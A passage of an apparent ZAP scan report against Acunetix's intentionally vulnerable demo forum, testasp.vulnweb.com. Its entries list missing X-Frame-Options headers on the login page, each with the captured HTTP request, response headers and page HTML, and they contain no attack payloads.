<tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
